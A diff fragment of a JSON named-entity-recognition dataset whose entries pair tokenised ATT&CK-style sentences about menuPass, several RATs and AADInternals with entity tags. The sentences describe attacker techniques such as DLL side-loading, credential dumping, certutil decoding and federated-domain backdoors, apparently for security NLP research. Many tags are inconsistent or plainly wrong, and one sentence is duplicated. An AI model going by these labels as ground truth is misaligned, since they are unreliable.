+ "legitimate", + "signatures." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "DLL", + "search", + "order", + "hijacking." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "DLL", + "side-loading", + "to", + "launch", + "versions", + "of", + "Mimikatz", + "and", + "PwDump6", + "as", + "well", + "as", + "UPPERCUT." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "collected", + "various", + "files", + "from", + "the", + "compromised", + "computers." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "collected", + "data", + "from", + "remote", + "systems", + "by", + "mounting", + "network", + "shares", + "with", + "<code>net", + "use</code>", + "and", + "using", + "Robocopy", + "to", + "transfer", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "certutil", + "in", + "a", + "macro", + "to", + "decode", + "base64-encoded", + "content", + "contained", + "in", + "a", + "dropper", + "document", + "attached", + "to", + "an", + "email.", + "The", + "group", + "has", + "also", + "used", + "<code>certutil", + "-decode</code>", + "to", + "decode", + "files", + "on", + "the", + "victim’s", + "machine", + "when", + "dropping", + "UPPERCUT." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "the", + "Microsoft", + "administration", + "tool", + "csvde.exe", + "to", + "export", + "Active", + "Directory", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "registered", + "malicious", + "domains", + "for", + "use", + "in", + "intrusion", + "campaigns." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "encoded", + "strings", + "in", + "its", + "malware", + "with", + "base64", + "as", + "well", + "as", + "with", + "a", + "simple,", + "single-byte", + "XOR", + "obfuscation", + "using", + "key", + "0x40." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "leveraged", + "vulnerabilities", + "in", + "Pulse", + "Secure", + "VPNs", + "to", + "hijack", + "sessions." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "tools", + "to", + "exploit", + "the", + "ZeroLogon", + "vulnerability", + "(CVE-2020-1472)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "B-Features" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "a", + "global", + "service", + "provider's", + "IP", + "as", + "a", + "proxy", + "for", + "C2", + "traffic", + "from", + "a", + "victim." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "dynamic", + "DNS", + "service", + "providers", + "to", + "host", + "malicious", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Org", + "B-Purp", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "menuPass", + "macro", + "deletes", + "files", + "after", + "it", + "has", + "decoded", + "and", + "decompressed", + "them." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "searched", + "compromised", + "systems", + "for", + "folders", + "of", + "interest", + "including", + "those", + "related", + "to", + "HR,", + "audit", + "and", + "expense,", + "and", + "meeting", + "memos." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "installed", + "updates", + "and", + "new", + "malware", + "on", + "victims." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "<code>InstallUtil.exe</code>", + "to", + "execute", + "malicious", + "software." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "key", + "loggers", + "to", + "steal", + "usernames", + "and", + "passwords." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "B-Purp" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "a", + "modified", + "version", + "of", + "pentesting", + "tools", + "wmiexec.vbs", + "and", + "secretsdump.py", + "to", + "dump", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "stages", + "data", + "prior", + "to", + "exfiltration", + "in", + "multi-part", + "archives,", + "often", + "saved", + "in", + "the", + "Recycle", + "Bin." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "attempted", + "to", + "get", + "victims", + "to", + "open", + "malicious", + "files", + "such", + "as", + "Windows", + "Shortcuts", + "(.lnk)", + "and/or", + "Microsoft", + "Office", + "documents,", + "sent", + "via", + "email", + "as", + "part", + "of", + "spearphishing", + "campaigns." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "I-Tool", + "B-SecTeam", + "B-SamFile", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "esentutl", + "to", + "change", + "file", + "extensions", + "to", + "their", + "true", + "type", + "that", + "were", + "masquerading", + "as", + ".txt", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "been", + "seen", + "changing", + "malicious", + "files", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "Ntdsutil", + "to", + "dump", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "native", + "APIs", + "including", + "<code>GetModuleFileName</code>,", + "<code>lstrcat</code>,", + "<code>CreateFile</code>,", + "and", + "<code>ReadFile</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "tcping.exe,", + "similar", + "to", + "Ping,", + "to", + "probe", + "port", + "status", + "on", + "systems", + "of", + "interest." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "uses", + "PowerSploit", + "to", + "inject", + "shellcode", + "into", + "PowerShell." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "process", + "hollowing", + "in", + "iexplore.exe", + "to", + "load", + "the", + "RedLeaves", + "implant." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "staged", + "data", + "on", + "remote", + "MSP", + "systems", + "or", + "other", + "victim", + "networks", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "RDP", + "connections", + "to", + "move", + "across", + "the", + "victim", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "uses", + "scripts", + "to", + "enumerate", + "IP", + "ranges", + "on", + "the", + "victim", + "network.", + "menuPass", + "has", + "also", + "issued", + "the", + "command", + "<code>net", + "view", + "/domain</code>", + "to", + "a", + "PlugX", + "implant", + "to", + "gather", + "information", + "about", + "remote", + "systems", + "on", + "the", + "network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "renamed", + "certutil", + "and", + "moved", + "it", + "to", + "a", + "different", + "location", + "on", + "the", + "system", + "to", + "avoid", + "detection", + "based", + "on", + "use", + "of", + "the", + "tool." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "Putty", + "Secure", + "Copy", + "Client", + "(PSCP)", + "to", + "transfer", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "a", + "script", + "(atexec.py)", + "to", + "execute", + "a", + "command", + "on", + "a", + "target", + "machine", + "via", + "Task", + "Scheduler." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "a", + "modified", + "version", + "of", + "pentesting", + "tools", + "wmiexec.vbs", + "and", + "secretsdump.py", + "to", + "dump", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "sent", + "malicious", + "Office", + "documents", + "via", + "email", + "as", + "part", + "of", + "spearphishing", + "campaigns", + "as", + "well", + "as", + "executables", + "disguised", + "as", + "documents." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "several", + "tools", + "to", + "scan", + "for", + "open", + "NetBIOS", + "nameservers", + "and", + "enumerate", + "NetBIOS", + "sessions." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "<code>net", + "use</code>", + "to", + "conduct", + "connectivity", + "checks", + "to", + "machines." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "and", + "modified", + "open-source", + "tools", + "like", + "Impacket,", + "Mimikatz,", + "and", + "pwdump." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "legitimate", + "access", + "granted", + "to", + "Managed", + "Service", + "Providers", + "in", + "order", + "to", + "access", + "victims", + "of", + "interest." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "valid", + "accounts", + "including", + "shared", + "between", + "Managed", + "Service", + "Providers", + "and", + "clients", + "to", + "move", + "between", + "the", + "two", + "environments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "executes", + "commands", + "using", + "a", + "command-line", + "interface", + "and", + "reverse", + "shell.", + "The", + "group", + "has", + "used", + "a", + "modified", + "version", + "of", + "pentesting", + "script", + "wmiexec.vbs", + "to", + "execute", + "commands.", + "menuPass", + "has", + "used", + "malicious", + "macros", + "embedded", + "inside", + "Office", + "documents", + "to", + "execute", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "menuPass", + "has", + "used", + "a", + "modified", + "version", + "of", + "pentesting", + "script", + "wmiexec.vbs,", + "which", + "logs", + "into", + "a", + "remote", + "machine", + "using", + "WMI." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "3PARA", + "RAT", + "has", + "a", + "command", + "to", + "retrieve", + "metadata", + "for", + "files", + "on", + "disk", + "as", + "well", + "as", + "a", + "command", + "to", + "list", + "the", + "current", + "working", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "3PARA", + "RAT", + "command", + "and", + "control", + "commands", + "are", + "encrypted", + "within", + "the", + "HTTP", + "C2", + "channel", + "using", + "the", + "DES", + "algorithm", + "in", + "CBC", + "mode", + "with", + "a", + "key", + "derived", + "from", + "the", + "MD5", + "hash", + "of", + "the", + "string", + "HYF54&%9&jkMCXuiS.", + "3PARA", + "RAT", + "will", + "use", + "an", + "8-byte", + "XOR", + "key", + "derived", + "from", + "the", + "string", + "HYF54&%9&jkMCXuiS", + "if", + "the", + "DES", + "decoding", + "fails" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "3PARA", + "RAT", + "has", + "a", + "command", + "to", + "set", + "certain", + "attributes", + "such", + "as", + "creation/modification", + "timestamps", + "on", + "files." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "3PARA", + "RAT", + "uses", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "4H", + "RAT", + "has", + "the", + "capability", + "to", + "obtain", + "file", + "and", + "directory", + "listings." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "4H", + "RAT", + "has", + "the", + "capability", + "to", + "obtain", + "a", + "listing", + "of", + "running", + "processes", + "(including", + "loaded", + "modules)." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "4H", + "RAT", + "obfuscates", + "C2", + "communication", + "using", + "a", + "1-byte", + "XOR", + "with", + "the", + "key", + "0xBE." + ], + "ner_tags": [ + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "4H", + "RAT", + "sends", + "an", + "OS", + "version", + "identifier", + "in", + "its", + "beacons." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "4H", + "RAT", + "uses", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "4H", + "RAT", + "has", + "the", + "capability", + "to", + "create", + "a", + "remote", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "enumerate", + "Azure", + "AD", + "users." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-HackOrg", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "create", + "new", + "Azure", + "AD", + "users." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "execute", + "commands", + "on", + "Azure", + "virtual", + "machines", + "using", + "the", + "VM", + "agent." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "enumerate", + "Azure", + "AD", + "groups." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "enumerate", + "information", + "about", + "a", + "variety", + "of", + "cloud", + "services,", + "such", + "as", + "Office", + "365", + "and", + "Sharepoint", + "instances", + "or", + "OpenID", + "Configurations." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "gather", + "unsecured", + "credentials", + "for", + "Azure", + "AD", + "services,", + "such", + "as", + "Azure", + "AD", + "Connect,", + "from", + "a", + "local", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "collect", + "files", + "from", + "a", + "user’s", + "OneDrive." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "register", + "a", + "device", + "to", + "Azure", + "AD." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "gather", + "information", + "about", + "a", + "tenant’s", + "domains", + "using", + "public", + "Microsoft", + "APIs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "check", + "for", + "the", + "existence", + "of", + "user", + "email", + "addresses", + "using", + "public", + "Microsoft", + "APIs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "directly", + "download", + "cloud", + "user", + "data", + "such", + "as", + "OneDrive", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "inject", + "a", + "malicious", + "DLL", + "(`PTASpy`)", + "into", + "the", + "`AzureADConnectAuthenticationAgentService`", + "to", + "backdoor", + "Azure", + "AD", + "Pass-Through", + "Authentication." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "dump", + "secrets", + "from", + "the", + "Local", + "Security", + "Authority." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "modify", + "registry", + "keys", + "as", + "part", + "of", + "setting", + "a", + "new", + "pass-through", + "authentication", + "agent." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "AADInternals", + "`Set-AADIntUserMFA`", + "command", + "can", + "be", + "used", + "to", + "disable", + "MFA", + "for", + "a", + "specified", + "user." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "is", + "written", + "and", + "executed", + "via", + "PowerShell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "gather", + "encryption", + "keys", + "from", + "Azure", + "AD", + "services", + "such", + "as", + "ADSync", + "and", + "Active", + "Directory", + "Federated", + "Services", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "be", + "used", + "to", + "create", + "SAML", + "tokens", + "using", + "the", + "AD", + "Federated", + "Services", + "token", + "signing", + "certificate." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "be", + "used", + "to", + "forge", + "Kerberos", + "tickets", + "using", + "the", + "password", + "hash", + "of", + "the", + "AZUREADSSOACC", + "account." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "send", + "\"consent", + "phishing\"", + "emails", + "containing", + "malicious", + "links", + "designed", + "to", + "steal", + "users’", + "access", + "tokens." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "send", + "phishing", + "emails", + "containing", + "malicious", + "links", + "designed", + "to", + "collect", + "users’", + "credentials." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "steal", + "users’", + "access", + "tokens", + "via", + "phishing", + "emails", + "containing", + "malicious", + "links." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "create", + "and", + "export", + "various", + "authentication", + "certificates,", + "including", + "those", + "associated", + "with", + "Azure", + "AD", + "joined/registered", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AADInternals", + "can", + "create", + "a", + "backdoor", + "by", + "converting", + "a", + "domain", + "to", + "a", + "federated", + "domain", + "which", + "will", + "be", + "able", + "to", + "authenticate", + "any", + "user", + "across", + "the", + "tenant.", + "AADInternals", + "can", + "also", + "modify", + "DesktopSSO", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "ABK", + "has", + "the", + "ability", + "to", + "decrypt", + "AES", + "encrypted", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "ABK", + "has", + "the", + "ability", + "to", + "download", + "files", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ABK", + "has", + "the", + "ability", + "to", + "inject", + "shellcode", + "into", + "svchost.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ABK", + "has", + "the", + "ability", + "to", + "identify", + "the", + "installed", + "anti-virus", + "product", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ABK", + "can", + "extract", + "a", + "malicious", + "Portable", + "Executable", + "(PE)", + "from", + "a", + "photo." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ABK", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "in", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ABK", + "has", + "the", + "ability", + "to", + "use", + "cmd", + "to", + "run", + "a", + "Portable", + "Executable", + "(PE)", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "encrypts", + "with", + "the", + "3DES", + "algorithm", + "and", + "a", + "hardcoded", + "key", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ADVSTORESHELL", + "compresses", + "output", + "data", + "generated", + "by", + "command", + "execution", + "with", + "a", + "custom", + "implementation", + "of", + "the", + "Lempel–Ziv–Welch", + "(LZW)", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 